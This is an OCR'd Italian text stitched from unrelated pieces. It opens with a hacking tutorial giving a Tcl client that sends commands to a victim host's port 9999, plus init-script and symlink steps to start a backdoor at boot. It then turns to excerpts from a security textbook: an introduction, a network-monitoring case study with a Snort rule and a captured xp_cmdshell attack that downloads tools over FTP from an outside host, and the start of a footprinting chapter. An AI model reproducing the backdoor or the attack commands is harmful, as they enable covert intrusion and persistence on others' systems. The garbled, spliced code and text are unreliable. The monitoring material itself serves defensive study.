wm geometry . 400x200 


#Sfondo rosso: 
. configure -bg red 


#Parte dell'HOST: 

label .host -text "Inserisci qui l'HOST della vittima:" -bg red 
entry .nhost -textvariable host 

place .host -x 10 -y 20 

place .nhost -x 230 -y 20 


#Parte per il messaggio: 

label .msg -text "Inserisci qui i comandi da dare al SERVER:" -bg red 
entry .mess -textvariable msg 

place .msg -x 10 -y 60 

pack .mess -fill x -pady 30m 


button .connetti -text "Connetti e invia" -command invia -bg blue 
place .connetti -x 130 -y 130 


#Procedura per l'invio del messaggio: 
proc invia {} { 
global host msg 


#Controllo se l'HOST è stato messo: 

if {[string length $host]<=0} { 
tk_messageBox -icon info -type ok -message "Attenzione! Non hai messo 
l'host!" 
return 1 


#Controllo per il messaggio esiste: 
} elseif {[string length $msg]<=0} { 
tk_messageBox -icon info -type ok -message \ 
"Non ha nessun senso connettersi al SERVER se manca un messaggio!" 
return 1 


#Controllo se l'IP è corretto: 

} elseif {![string match *.*.*.* $host]} { 
tk_messageBox -icon info -type ok -message \ 
"Attenzione! L'HOST è tipo 127.0.0.1 !" 
return 1 

} else { 


#Creo il socket e invio i dati: 

set s [socket $host 9999] 

puts $s $msg 

tk_messageBox -icon info -type ok -message \ 
"Messaggio inviato con successo!" 

return 1 


Fatto! L'ho pure commentato per farvelo capire meglio :). 


Semplicemente mando un messaggio all'IP... sarà poi lui a farlo eseguire. 
Sappiate che il CLIENT è accetta 2 variabili: HOST e MSG. Uno è il IP del 
server, l'altro è il messaggio da mandare. Per sicurezza ho fatto dei 
controlli sulle variabili. 

Questi sono: 


LA LUNGHEZZA (che non deve essere nulla!): if {[string length $msg]<=0}... 
ed anche: if {[string length $msg]<=0} {... 
SE E UN VERO IP: if {![string match *.*.*.* $host]} {... 


Poi connetto con il solito uso dei socket: set s [socket $host 9999] e invio i 
messaggi: puts $s $msg. 


EX CLARO? 

Passiamo alla parte più interessante... far partire un processo all'avvio! 
COME FARE? 

Semplicissimo! 

Basterà creare uno script anche ben inculato... e linkarlo nel posto giusto! 
Metterò lo server in TCL nella directory /usr e lo salverò col nome di 1dd2cd. 
Voi mettetelo dove volete! 


Questo script lo salvo nella stessa directory /usr e lo salvo come 1dd2ck 


Vediamo prima lo script che ci serve: 


#!/bin/sh 


case "$1" in 
start) 
echo -n "Attivation connection:" 
tel /usr/1dd2cd & || exit 1 


echo ". 


$3 


stop) 
#Volete dare pure la possibilità di fermarlo? =) 


echo "." 

) Pi 
echo "Use: 1dd2ck {start|stop}" 
exit 1 


Semplice no? 


Per non marcare particolarmente non mettiamo in esecuzione il file 1dd2cd! Ma 
teniamolo come file normali. Per farlo partire interpelliamo direttamente il 
programma tel: tcl /usr/1dd2cd. 


Sicuramente dovrete dare l'eseguibile al file 1dd2ck, quindi: 
chmod +x /usr/1dd2ck 


Ora mettiamolo in esecuzione all'avvio! 
Come fare? 


Entriamo nella directory /etc/ 

Qui dovrebbe esserci una directory /rc.d e altre varie. 

Dico dovrebbe perchè cambia in base alle distro di UNIX o LINUX. Entrate 
nella directory che ci assomiglia di più e all'interno entrate nella directory 
che volete! 


Dico questo perchè mediamente queste dovrebbero tipo: rc1.d rc2.d o simili 
Sappiate che in base alle varie distro può cambiare abbastanza! 


Entrati lì dentro fate questo: 


In -s /usr/1dd2ck S391dd2ck 


Cosa ho fatto? Semplice, ho creato un collegamento simbolico da /usr/1dd2ck 
alla directory in cui siete ora. In più ho dato il nome al link come 
S39idd2ck. 


NOTA IMPORTANTE: S39 per un motivo molto importante! Nella directory che avete 
scelto per il link vedrete che tutti i file sono numerati o come Snumero o 

come Knumero. È indifferente che lettera scegliete l'importante e che il 

numero sia molto basso. Io ho scelto S39 ma se c'è già cambiate! 


Mettete il numero che volete voi in base all'assenza di essi. Quindi fate! 

Più il numero è piccolo più parte prima all'avvio. Avete in mente come parte 
una macchina linux? Dopo i lavori del kernel, incomincia a far partire file 

di configurazione. Quelli sono tutti lì! E vengono caricati in ordine del 
numero e della lettera. 


Ora non resta che farlo partire subito con un bel: 
./1dd2ck start 


e via! La backdoor è montata e funzionante... non vi resta che uscire e 
giocare con vostro bel client sulla porta 9999. 


Spero di avervi mostrato un metodo come un altro per la creazione di una 
backdoor in un sistema *NIX/LINUX con un minimo di programmazione in TCL. 


Stuart McClure 
Joel Scambray « George Kurtz 
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Introduzione 


Ci viene chiesto continuamente: “Davvero insegnate le tecniche dell’hacking?” 
Invariabilmente, rispondiamo: “Sì, più o meno. Spieghiamo con esempi pratici le 
tecniche e la mentalità degli hacker. Illustriamo in che modo essi operano. Sveliamo 
gli arcani delle loro tecniche affinché possiate difendervi. Se non ci liberiamo di 
questi pregiudizi, gli utenti non saranno mai al sicuro,” C'è un'altra domanda che ci 
viene posta: “Le probabilità di successo sono a favore degli hacker?” La risposta a 
questa domanda è un sì, ma con riserva. Se si tiene conto unicamente del tempo 
che dedicano all’individuazione di metodi utili per forzare la sicurezza, gli aggresso- 
ri hanno ottime carte da giocare (potete puntare su di loro). Tuttavia, grazie alle in- 
formazioni fornite da libri come questo, l’esito della partita non è poi così scontato, 
Che cosa intendiamo dire realmente? Certo, la sicurezza è un tema arduo e le infor- 
mazioni sulle tecniche e contromisure da adottare per difendersi dagli hacker sono 
ancora più difficili da assimilare; guardiamo però in faccia la realtà: coloro che ope- 
rano nel settore dell'IT sono avidi di informazioni sugli attacchi alle reti, ai sistemi 
operativi, ai database e agli application layer. Sono pochi gli amministratori che ca- 
piscono realmente che cosa s'intende per sicurezza e sanno come gestire gli enormi 
problemi connessi. Invece gli hacker sono bene informati su questi punti vulnerabi- 
li e conoscono gli attacchi per sfruttare questi punti deboli. Chi dunque ha in mano 
le carte migliori? 

Dovete rendervi conto che gli hacker conoscono già tutti i trucchi; a essi non pos- 
siamo insegnare proprio nulla. In pratica, intendiamo fornire al lettore un'idea della 
mentalità e delle tecniche dell'hacker. Nel caso che qualcuno abbia obiezioni in 
merito al contenuto di questo libro, provi a pensare a quanto potrebbe accadere 
senza di esso: i malintenzionati sarebbero gli unici a disporre di queste informazioni 
e voi sareste in loro balia. Sarebbe una lotta impari, non vi pare? 

Se non siamo riusciti a chiarire fino in fondo gli obiettivi di questo libro, consentite- 
ci di ribadirli: utilizzate queste informazioni solo per scopi leciti. Se non darete 
ascolto a questo suggerimento, vi scoveremo e per voi non sarà un'esperienza pia- 
cevole. 


Novità della quarta edizione 


Il mondo digitale si muove a una velocità superiore a quella della luce. Apparente- 
mente, non passa un’ora senza che facciano la loro comparsa nuovi tool per gli hac- 
ker, nuove tecniche e metodologie; il compito di raccogliere e disseminare informa- 


xxii Hacker! 4.0 


zioni su queste nuove tecnologie e di renderle intelligibili è molto impegnativo. 
Come nelle precedenti edizioni, ci siamo prodigati per fornirvi le informazioni più 
aggiornate su tecnologie e tecniche. 


Nuovi contenuti 


I nuovi argomenti affrontati per la prima volta in questa edizione sono elencati di 

seguito. 

1. Un capitolo totalmente nuovo dedicato gli attacchi alle reti wireless 802.11. 

2. 1 metodi di hacking delle reti più recenti, come quelli che prevedono l’uti- 
lizzo del tracerouting, di dsniff, linsniff, ARP, SNMP, RIP. 

3. Contromisure aggiornate per prevenire lo sfruttamento di vulnerabilità dei 
firewall connesse ai proxy e al filtraggio dei pacchetti. 

4. Un capitolo sul Web Hacking completamente rivisto e aggiornato, con la 
descrizione delle più recenti vulnerabilità specifiche di varie piattaforme, da 
Apache a IIS, delle più recenti tecniche, compresi il cross-site scripting, il 
fuzzing e gli attacchi a iniezione SQL, e di tutti i più recenti tool, da Achilles 
a Nikto. 

5. Descrizione di tutti i nuovi tool DDo$ (Distributed Denial of Service) e dei 
relativi trucchi. 

6. Nuove informazioni sul “rischio Web”, compresi i punti deboli della valida- 
zione dell'input e i talloni d'Achille della progettazione di siti Web. 

7. Nuovi casi di studio presentati all’inizio di ogni parte, riguardanti recenti at- 
tacchi alla sicurezza degni di nota. 

8. Nuove tecniche per ottenere l’accesso non autorizzato a Windows 
9x/ME/XP e Windows NT/2000/2003 Server, Novell 6, UNIX, Linux e deci- 
ne di altre piattaforme. 

9. Nuove strategie per attuare una difesa preventiva contro attacchi dial-up, 
PBX, voicemail e a VPN. 

10. Il popolare sito Web http://ww.hackingexposed.com contiene link a tutti 
i tool e tutte le risorse Internet citati. 


Facile consultazione 


Per questa quarta edizione abbiamo utilizzato il popolare formato di Hacker! ; ogni 
tecnica di attacco viene evidenziata con una speciale icona sul margine della pagi- 
na, simile a quella mostrata di seguito. 


1) Icona dell’attacco 


Questa icona facilita l'individuazione di specifici tool per test di penetrazione e del- 

le relative metodologie. 

e Aogniattacco è associata una contromisura adeguata, di utilità pratica ed 
efficacia comprovata. 

Anche le contromisure sono contrassegnate da un’icona specifica. 
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Icona della contromisura 


Potete andare direttamente alla soluzione dei problemi, se lo desiderate! 

e Abbiamoeffettuato una “pulizia” radicale dei listati di codice esemplificativi, 
delle schermate e dei diagrammi, evidenziando in modo speciale l’input 
dell'utente mediante l'utilizzo del neretto nei suddetti listati. 


e Aogniattacco è associato un fattore di rischio aggiornato, ricavato da tre 
componenti e basato sull'esperienza degli autori. 


Diffusione: 


Semplicità: 


Impatto: 


Fattore di rischio: 


Nota finale 


La frequenza con cui il tipo di attacco in questione viene utilizzato 
contro bersagli reali (1 corrisponde a “raro”, 10 a “utilizzato di fre- 
quente”). 


Il livello di abilità necessaria per eseguire l'attacco (1 corrisponde 
all'abilità di un programmatore esperto di problemi di sicurezza, 10 
corrisponde a quella di un principiante). 


I danni potenziali provocati dal successo dell'attacco (1 corrisponde 
all'accesso a informazioni di scarsa importanza sul bersaglio, 10 alla 
compromissione dell'account superuser o un danno equivalente). 


Viene calcolata la media dei tre valori precedenti, in modo da fornire 
la classificazione complessiva del rischio, 


Come sempre, ci siamo sforzati di fornire informazioni tempestive, accurate e re- 
almente utili sulle tecniche degli hacker e sui tool da essi utilizzati, mettendovi 
contemporaneamente in grado di difendervi da costoro. Speriamo che in questo 
libro possiate trovare qualcosa di realmente utile, non solo una serie di astuti stra- 
tagemmi. Confidiamo invece che vi rendiate conto dell'importanza di proteggere 
il vostro patrimonio di informazioni in un mondo popolato da malintenzionati. 


Buona lettura! 


tai 
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Esame della struttura 


I Footprinting 
2 Scansione 


3 Enumerazione 


2 Parte | 


Caso di studio: monitoraggio 
della sicurezza delle reti 


Qual è il livello di efficacia dei sistemi di intercettazione delle intrusioni (IDS) ri- 
spetto agli attacchi descritti in questo libro? I fornitori di software cercano con ogni 
mezzo di rilevare pacchetti con velocità di trasmissione ancora maggiori. Gli utenti 
si lamentano dei “falsi risultati positivi” e della “correlazione degli eventi”. La critto- 
grafia e il codice polimorfico minacciano di sconfiggere i sistemi di comparazione 
delle impronte. Si intravvede la luce alla fine del tunnel? La risposta è affermativa. Si 
chiama monitoraggio della sicurezza delle reti, o NSM (Network Security Monito- 
ring). 

L'NSM prevede la raccolta, l'analisi e l'intensificazione di indicazioni e avvertimenti 
utili a rilevare le intrusioni e rispondervi. L’NSM, il cui nome si ispira a “Network Se- 
curity Monitor” di Todd Heberlein, è un modello operativo basato sui metodi di rac- 
colta di informazioni segrete dei segnali dell’aviazione militare statunitense. Com- 
prende i prodotti di intercettazione delle intrusioni (IDS), che generano avvisi, il 
personale incaricato di interpretare indicazioni e avvertimenti e i processi, che in- 
nalzano il livello di attenzione per eventi validati, a beneficio di coloro cui spetta 
prendere decisioni. Descriveremo il monitoraggio della sicurezza delle reti nel con- 
testo di un'intrusione che è stata rilevata e neutralizzata basandosi appunto sui prin- 
cipi dell’NSM. 

L'NSM tiene conto del fatto che occorrono tre tipi di indicazioni e avvertimenti (dati 
I&W) per produrre un quadro completo di un'attività sospetta. Il primo tipo, i dati 
di evento, è costituito da avvisi generati da sistemi di intercettazione delle intrusio- 
ni. Solitamente, questi dati sono generati da un'impronta. Ecco una regola di Snort 
per vigilare su attacchi sferrati ai server Microsoft SQL: 


alert tcp $EXTERNAL NET any -> $SOL_SERVERS 1433 (msg:MS-SQL xp_cmdshell - program 
execution; content: x/00jp{00|_j00!c|00:m/00!d/00/s/00/h}00|e{00/1/00|1/00); 
nocase; flags:A+; classtype:attempted-user; sid:687; rev:3;) 


Questo tipo di regola genera dati di evento quando l'IDS vede un pacchetto conte- 
nente dati conformi ai criteri. Ecco un esempio di questa regola di Snort, che scatta 
dopo l'individuazione di un pacchetto sospetto: 


[**] [1:687:3] MS-SOL xp_cmdshell - program execution [**] 
[Classification: Attempted User Privilege Gain] [Priority: 1] 
04/02-12:46:58.109453 172.16.86.36:3544 -> 192.168.46.111:1433 
TCP TTL:107 TOS:0x0 ID:18073 IpLen:20 DgmLen:182 DF 

***AP*** Seg: 0x5D4A696 Ack: Ox7ACAAC20 Win: 0x3F1@ Tcplen: 20 


Questi dati di evento indicano che un pacchetto proveniente da 172.16.86.36 con- 
tiene l'impronta contrassegnata come avviso “MS-SQL xp_cmdshell — program exe- 
cution”. Se un analista non dispone di dati di supporto, non può essere certo che 
questo indicatore segnali un attacco da parte di un malintenzionato. La maggior 
parte degli utenti di IDS, nel migliore dei casi, non sa come sfruttare tutte queste in- 
formazioni. Coloro che utilizzano i principi guida dell’NSM hanno qualche carta in 
più da giocare. 

Oltre che sui dati di evento, l’NSM si basa sui dati di sessione. Questi tipi di dati 
I&W includono informazioni riassuntive sulle connessioni di rete. Questo “network 
digest” (condensato dei dati della rete) include l’ora, gli indirizzi IP, le porte sorgen- 
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tie di destinazione e pacchetti e byte di dati inviati dalla sorgente e dalla destinazio- 
ne. I dati di evento possono essere le informazioni più interessanti tra quelle dispo- 
nibili. In questo caso la crittografia non rappresenta un ostacolo. Anche i pacchetti 
per i quali non è scritta alcuna impronta non passano inosservati. Tutti i dati di ses- 
sione riguardano le conversazioni tra due host. L'esempio seguente si riferisce ai 
dati di sessione. Riuscite a vedere la sessione TCP che ha provocato la generazione 
di avvisi Snort? Essa ha avuto luogo alle ore 12:46:58. 


Time | Source IP | Port | Destination | Port | SP | SB |DP | DB 
Paone Fiona rrenprinzo pois errore ne ne piene pera niapfi nino nonpiitonopiiorenne 
12:09:42 | 172.16.86.36 | 3341 | 192.168,46.111) 1433! 5! 260! 31! 124 
12:09:42 ! 172.16.86.36 ! 3342! 192.168.46.111 | 1433! 56! 2460! 99! 134467 
12:09:52 ! 172.16.86.36 | 3343! 192.168.46.111! 1433! 6! 466! 3! 1064 
12:09:58 ! 172.16.86.36 | 3344! 192.168.46.111! 1433! 6! 466! 3! 645 
12:10:05 ! 172.16.86.36 '! 3345! 192.168,46.,111 | 1433! 6! 460! 3! 681 
12:10:10 ! 172.16.86.36 | 3346 |! 192.168,46.111 | 1433! 6! 466! 3' 681 
12:46:51 ! 172.16.86.36 | 3535! 192.168.46.111 | 1433! 5! 44! 3! 571 
12:46:52 ! 172,16.86.36 | 3536 | 192.168.46,111! 1433! 51! "1. ROBI 571 
12:46:53 | 172.16.86.36 | 3537 | 192.168.46.111 | 1433) 5] 480! 831 571 
12:46:53 ! 172.16.86.36 | 3538 |! 192.168.46.111! 1433! 5! 482! 3! 8571 
12:46:54 | 172.16.86.36 | 3539 |! 192.168.46.111 | 1433! 5! #78 .1)0-81 571 
12:46:55 ! 172.16.86.36 |! 3541! 192.168.46.111 | 1433! 5! 532) 3! 571 
12:46:55 | 172.16.86.36 ' 3540! 192.168.46.111! 1433! 5! 548. 31 571 
12:46:56 | 172,16.86.36 |! 3542! 192.168,46.,111 | 1433! 5) 524.1 al. Bri 
12:46:57 | 172.16.86.36 |! 3543! 192.168.46.111! 1433! 5! 45661 3!  S71 
12:46:58 | 172,16.86.36 | 3544! 192.168.46,111 | 1433! 9! 654! 8! 6648 
12:46:58 | 192.168.46.111 ! 2267 |! 172.173.86.248 |! 21! 24! 1144! 22! 3433 
12:47:00 ! 172.173.86.248 |! 20! 192.168.46.111 | 2268! 7) 2047! 4! 164 
12:47:01 |! 172,173.86.248 | 20! 192.168.46.111 ! 2269 | 365! 511444! 242! 9684 
12:47:11 ! 172.173.86.248 |! 20! 192.168.46.111 | 2271! 17! 18608! 11! 444 
12:47:13 | 172.16.86.36 | 3550 | 192.168.46.111! 1433! 5! 438! 4! 611 
12:47:16 ! 172.16.86.36 | 3551 | 192.168.46.111! 1433! 6! 507! 4! 580 
12:47:30 ! 172.16.86.36 | 3552 | 192.168.46,111 | 5446! 36) 1583! 27! 1671 
12:47:32 ! 172.16.86.36 | 3553 |! 192.168.46.111 | 2274! 4! 168! 51! 603 


Le colonne, il cui significato non è evidente, sono: SP (il numero di pacchetti inviati 
dalla fonte), SB (il numero di byte di dati inviati dall'origine), DP (il numero di pac- 
chetti'inviati dalla destinazione) e DB (il numero di byte di dati inviati dalla destina- 
zione). 

Questo log di sessione avrebbe potuto contenere altri elementi, per esempio il pro- 
tocollo per ogni connessione (in questo caso, TCP), la data e i flag TCP osservati 
durante ogni conversazione. 

Il primo segno di un'attività intrusiva da parte dell’aggressore, 172.16.86.36, viene 
rilevato verso le 12:09. Visto il numero ridotto di byte sorgente e di destinazione e il 
numero di pacchetti inviati dalla sorgente e dalla destinazione, si può assumere che 
si tratti di un’attività di riconoscimento. In effetti, il nostro motore di rilevamento ha 
scoperto questo evento. Esso è registrato in un log di riconoscimento separato: 


[**] [100:1:1] spp_portscan: PORTSCAN DETECTED from 172.16.86.36 (THRESHOLD 
4 connections exceeded in Q seconds) [**] 


Oltre all’attività riguardante la porta 1433 TCP sulla macchina violata, rileviamo una 
sessione FTP in uscita da 192.168.46.111 e diretta a 172.173.86.248, alle ore 
12:46:58. Vediamo il traffico del canale di controllo sulla porta 21 TCP, seguito da 
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tre canali dati sulla porta 20 TCP. Osserviamo poi altre due connessioni alla porta 
1433 TCP, che presumibilmente servono per eseguire ulteriori comandi. Esse sono 
seguite da connessioni alle porte 5446 TCP e 2274 TCP sul sistema violato. Avendo 
rilevato questa attività, le informazioni di cui disponiamo su questo incidente risul- 
tano più dettagliate di quelle fornite dai dati di evento. 

Provate a immaginare tutte le varie query a cui diamo risposta utilizzando i nostri 
dati di sessione. Potremmo esaminare tutto il traffico riguardante gli elementi se- 
guenti: 


l'intruso, 172.16.86.36; 

la porta 1433 TCP, il bersaglio dei tentativi di penetrazione; 
il sito dei tool dell’intruso, 172.173.86.248; 

la porta 5446 TCP, una porta sospetta; 

la porta 2274 TCP, un’altra porta sospetta. 


Identificando altri server compromessi, potremmo cercare tutto il traffico riguardan- 
te questi sistemi violati, così come abbiamo fatto per 192.168.46.111. 

Il terzo tipo di dati I&W richiede il salvataggio di pacchetti sul disco rigido dell’IDS. 
Sfortunatamente, la registrazione integrale funziona solo su reti a larghezza di ban- 
da ridotta con politiche di sicurezza e utilizzo applicate rigidamente. Siamo riusciti a 
salvare quasi trenta giorni di dati, su un'unità a 18 GB, in siti di clienti con connes- 
sioni T-1. Tuttavia, i clienti che utilizzano distribuzioni speculari di Linux sono inse- 
riti in reti peer-to-peer e si servono ampiamente di streaming audio e video, renden- 
do in breve tempo impossibile la registrazione integrale. 

Negli ambienti a banda larga, i tecnici della sicurezza devono decidere quale traffi- 
co non deve essere registrato. Alcuni sceglieranno di ignorare servizi molto diffusi, 
quali HTTP diretto all’esterno, lo streaming audio e video diretto all’interno e tutto 
il traffico peer-to-peer. Gli aggressori possono sfruttare queste limitazioni per i loro 
scopi, come dimostreremo in seguito, 

Il lato positivo della registrazione integrale dei contenuti risiede nella possibilità di 
acquisire materiale probatorio sulla rete, utile per un'eventuale azione legale contro 
l'aggressore, indipendentemente dalla presenza o dall'assenza di regole per rilevare 
l'evento in questione. Assumendo che i pacchetti associati a un evento vengano re- 
gistrati e che non siano criptati, è possibile esaminare gli incidenti in modo partico- 
larmente dettagliato. 

Ecco, per esempio, il contenuto completo per il pacchetto che ha fatto scattare la 
prima regola di Snort: 


04/02-12:46:58.109453 0:3:31:DF:80:1C -> 0:50:54:FF:7F:2C type:0x800 len:0xC4 
172.16.86.36:3544 -> 192.168.46.111:1433 TCP TTL:107 TOS:0x0 ID:18073 IpLen:20 
DgmLen:182 DF 

***AP*** Seg: @0x5D4A696 Ack: Ox7ACAAC20 Win: 0x3F10 TcpLen: 20 

01 01 00 BE 00 00 DI 00 45 00 58 20 45 00 43 00 ........E.X.E.C. 

20 00 60 00 GI 00 73 00 74 00 65 00 72 00 2E 00 .m.a.s.t.e.r... 

2E 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 00 ..x.p. .c.m.d. 

68 00 65 020 GC 00 GC 00 20 00 22 00 66 00 74 00 h.e.1.1. .".f 
70 00 2E 00 65 00 78 00 65 00 20 00 2D 00 76 00 p...e.x.e. ... 
20 00 20 00 GE 00 20 00 2D 00 73 00 3A 00 5C 00 .- ‘. 

66 00 74 00 70 00 2E 00 74 00 78 00 74 00 20 00 f.t 
31 00 37 00 32 00 2E 00 31 00 37 00 33 00 2E 00 1.7. 
38 00 36 00 2E 00 32 00 34 00 38 00 22 00 8.6 
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Possiamo osservare l’intruso che da 172.16.86.36 cerca di introdursi in un sistema 
(192.168.46.111) per iniziare una sessione FTP con 172.173.86.248. L'intruso sta cer- 
cando di sfruttare un punto vulnerabile di Microsoft SQL Server e ha apparentemen- 
te già creato un file sul sistema violato, chiamato ftp.txt, contenente comandi da 
eseguire durante la sessione FTP. Poiché abbiamo effettuato la registrazione inte- 
grale dei dati per questa connessione, questi comandi sono stati salvati sul disco ri- 
gido dell’IDS: 


user upload 

pass upl@ad 

cwd HaxQr 

PORT 192,168,46,111,8,220 
RETR servudaemon.ini 

PORT 192,168,46,111,8,221 
RETR winmgnt. exe 

PORT 192,168,46,111,8,223 
RETA tlist.exe 

QUIT 


Ecco i dati inviati dalla destinazione, cioè dal server FTP all’indirizzo 172.173.86,248 
(noterete che l'output è stato modificato per motivi di spazio e per proteggere 
l'identità degli interessati): 


220-Welcome to Our Server 


230-Days up :: 6 days. 
230-Hours up :: 19 hours. 
230-Minutes up :: 46 minutes. 
230-Seconds up :: 10 seconds. 


230-Users logged in now :: 2 users. 
230-Users logged in last 24 hours :: 23 users. 
230-Total users logged in :: 250 users. 


230-Current throughput :: 0.000 Kb/sec 
230- (Average throughput :: 0.418 Kb/sec) 


230-Kilobytes Uploaded :: 1985 Kb. 
230-Kilobytes Downloaded :: 244500 Kb. 


230-Files Uploaded :: 11 files. 
230-Files Downloaded :: 615 files. 


230-(192.168.46.111) 

ME... Ta SEI PIE RITA TIE] IMPATTO TAO ITIIA 
230-Do NOT Rehack This Pubstro 

230-Do NOT Upload or Delete On This Pubstro 

230-Do NOT Hammer 
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250-136.79 MB free 
250-2 users connected 
250-0.203 KB/sec is in use 


250 Directory changed to /Hax0r 

200 PORT Command successful. 

150 Opening ASCII mode data connection for servudaemon.ini (1759 bytes). 
226 Transfer complete. 

200 PORT Command successful. 

150 Opening ASCII mode data connection for winmgnt.exe (496836 bytes). 
226 Transfer complete. 

200 PORT Command successful. 

150 Opening ASCII mode data connection for tlist.exe (17920 bytes). 

226 Transfer complete. 


220 - Have a nice day! 


Dal momento che stiamo raccogliendo dati grezzi completi, possiamo utilizzare 
Ethereal (ww.ethereal.com) per ricostruire i tre file che sono stati scaricati sulla 
macchina violata. Il primo di essi, servudaemon. ini, è un file di testo. Ecco l’inizio 
del file: 


[GLOBAL] 

Version=3.1.0.3 
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAAAAOXVDzWQAJWIQACFJIYUXxJC1 
R5BFJ1YUWw= 

LocalSetupPassword=56354F5147035E545F1E405E 

LocalSetupPortNo=5446 

AntiHammer=1 

SocketKeepAlive=1 

PacketTimeOut=300 


Queste informazioni sono fondamentali, poiché illustrano il traffico osservato sulla 
porta 5446 TCP diretto verso la macchina violata. Ricordate le righe seguenti nei 
dati di connessione? 


5446 36 


i 1583 
2274 | 4 


168 


12:47:30 | 172.16.86.36 | 3552 | 192.168.46.111 
12:47:32 | 172.16.86.36 | 3553 | 192,168.46.111 


Esaminate ora questa riga di servudaemon.ini: 


LocalSetupPortNo=5446 


Essa indica che un server FTP programmato rimarrà in ascolto sulla porta 5446 TCP 
della macchina violata. 

Possiamo ora assumere che la porta 5446 TCP è il canale di controllo per questo 
nuovo server FTP. La porta 2274 TCP è quindi il canale dati? Sfortunatamente, l'ag- 
gressore ha sfruttato in modo inconsapevole le restrizioni sul logging connesse al 
monitoraggio di un sito a larghezza di banda elevata. Sebbene il nostro sistema di 
monitoraggio della sicurezza delle reti abbia catturato l'interazione dell’intruso con 
il server SQL, acquisito le battute sulla tastiera durante la sua sessione FTP e raccol- 
to i file trasmessi, il traffico riguardante le porte 5446 e 2274 TCP non è stato regi- 
strato. 
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Il secondo e il terzo file recuperati dall’intruso sono file binari di Windows, come 
mostrato dal comando UNIX file: 


file winmgnt.exe tlist.exe 
winmgnt.exe: MS-DOS executable (EXE), 05/2 or MS Windows 
tlist.exe: MS Windows PE 32-bit Intel 80386 console executable not relocatable 


Questi file binari potrebbero essere disassemblati, eseguiti su una macchina di pro- 
va, o analizzati in diversi altri modi. 
Una ricerca sul Web rivela che tlist.exe è un'utility Windows per l’elencazione 
dei processi. Non siamo stati in grado di stabilire la funzione del file winmgnt . exe 
senza effettuare un'analisi binaria sull’eseguibile. Neppure l’NSM è in grado di ri- 
spondere a tutte le nostre domande! 


‘Gestione di un incidente mediante 
il monitoraggio autonomo 
della sicurezza delle reti 


Prendete in esame questi due scenari e indovinate in quale dei due viene imple- 
mentato |'NSM, 

1. Un analista si avvede che il suo sistema di riconoscimento delle intrusioni 
sulla rete segnala un evento sospetto. Egli non è in grado di validare l’inci- 
dente in modo indipendente e non è nemmeno sicuro di potersi affidare al 
suo IDS. Apre un trouble ticket (messaggio di segnalazione problemi) e lo 
inoltra al responsabile dell’amministrazione della macchina bersaglio. Se è 
abbastanza preoccupato, chiama il cliente per chiedergli di indagare su una 
possibile compromissione. Egli dispone di informazioni limitate sulle circo- 
stanze dell'incidente. Riprende a lavorare. 

2. Un analista si avvede che il suo sistema di riconoscimento delle intrusioni 
sulla rete segnala un evento sospetto. Consulta i dati di evento, i dati di ses- 
sione e i dati grezzi. Egli si fida del suo IDS poiché è in grado di validarne i 
risultati. Stabilisce in modo indipendente che un intruso ha sfruttato un at- 
tacco di un server vulnerabile Microsoft SQL, inducendolo a scaricare tre 
file tramite FTP. I suoi dati di sessione mostrano che il server FTP è attivo. 
Egli verifica la natura dell’intrusione esaminando i file trasmessi durante la 
sessione FTP. Eseguendo una ricerca a ritroso nei suoi file di log, riesce a 
individuare l’inizio dell'attacco al punto vulnerabile e scopre in che modo 
l’intruso ha compromesso il sistema violato. Forte di queste informazioni, 
l'analista NMS telefona al cliente, gli spiega la situazione e suggerisce alcu- 
ne soluzioni per risolvere il problema, poiché è a conoscenza di tutto ciò 
che è accaduto alla macchina violata. Quando il cliente è soddisfatto, classi- 
fica gli avvisi pertinenti sul suo monitor e vi aggiunge il proprio nome uten- 
te, assumendosi in questo modo la responsabilità delle proprie azioni. Ri- 
prende poi a lavorare, pronto a mettere a disposizione materiale probatorio, 
qualora il cliente decida di adire alle vie legali nei confronti dell’intruso. 
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Footprinting 


Prima di arrivare alla parte realmente interessante, un hacker deve compiere tre 
passaggi fondamentali. In questo capitolo viene presentato il primo, il cosiddetto 
footprinting, ovvero la sottile arte di raccogliere informazioni su un possibile obiet- 
tivo, Quando, per esempio, i ladri decidono di svaligiare una banca, non si limitano 
a entrare e a pretendere i soldi (non i più furbi, almeno). Prima di tutto raccolgono 
informazioni sulla banca: i percorsi e gli orari del furgone blindato, la posizione del- 
le telecamere, il numero di impiegati, le uscite di sicurezza e qualsiasi altra informa- 
zione possa risultare utile per il colpo. 

Lo stesso vale per qualsiasi hacker: per riuscire a portare a termine un attacco pun- 
tuale e chirurgico (che non sia quindi immediatamente riconoscibile come tale), è 
necessaria una notevole quantità di informazioni, Di conseguenza, l’hacker cerche- 
rà di raccogliere il maggior numero possibile di informazioni su tutti gli aspetti rela- 
tivi alla protezione di una struttura. L'obiettivo è determinarne il foosprint (letteral- 
mente “impronta”), cioè il profilo della presenza di Internet, della tecnologia per 
l'accesso remoto e di eventuali Intranet/Extranet. Seguendo una metodologia ben 
strutturata, gli hacker riescono a raccogliere informazioni da una serie di fonti e a ri- 
costruire l'impronta fondamentale di qualsiasi organizzazione. 


Che cos'è il footprinting 


Il footprinting sistematico di un’organizzazione consente all’hacker di ricostruire il 
profilo del suo livello di protezione. Utilizzando una combinazione di strumenti e 
tecniche, l’hacker riesce a restringere la ricerca su un numero imprecisato di ele- 
menti (la connessione a Internet della Widget Company) a uno specifico intervallo 
di nomi di dominio, blocchi di rete e ai singoli indirizzi IP dei sistemi direttamente 
collegati a Internet. Esistono numerose tecniche di footprinting, ma tutte hanno 
come obiettivo principale la ricerca di informazioni su queste tecnologie: Internet, 
Intranet, accesso remoto ed Extranet. La Tabella 1.1 elenca queste tecnologie e le 
informazioni critiche che un hacker è interessato a raccogliere. 

Il footprinting assicura la raccolta sistematica e metodica di tutte le informazioni di- 
sponibili sulle tecnologie elencate nella tabella. Senza il supporto di una procedura 
collaudata per questo tipo di ricognizione, probabilmente sfuggirebbero elementi 
chiave delle informazioni relative a una particolare tecnologia o struttura. 
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Tabella 1.1 Tecnologie e informazioni critiche che un hacker deve cercare di raccogliere 


Tecnologia Informazioni 


Internet Nomi di dominio 
Blocchi della rete 
Indirizzi IP dei sistemi raggiungibili da Internet 
Servizi TCP e UDP in esecuzione su ciascuno dei sistemi identificati 
Architettura di sistema (per esempio, SPARC piuttosto che X86) 
Meccanismi di controllo degli accessi e relativi elenchi (ACL, Access Control 
List) 
Sistemi di intercettazione delle intrusioni (IDSes) 
Enumerazione del sistema (nomi utente e di gruppo, messaggi di sistema, 
tabelle di instradamento, informazioni SNMP) 


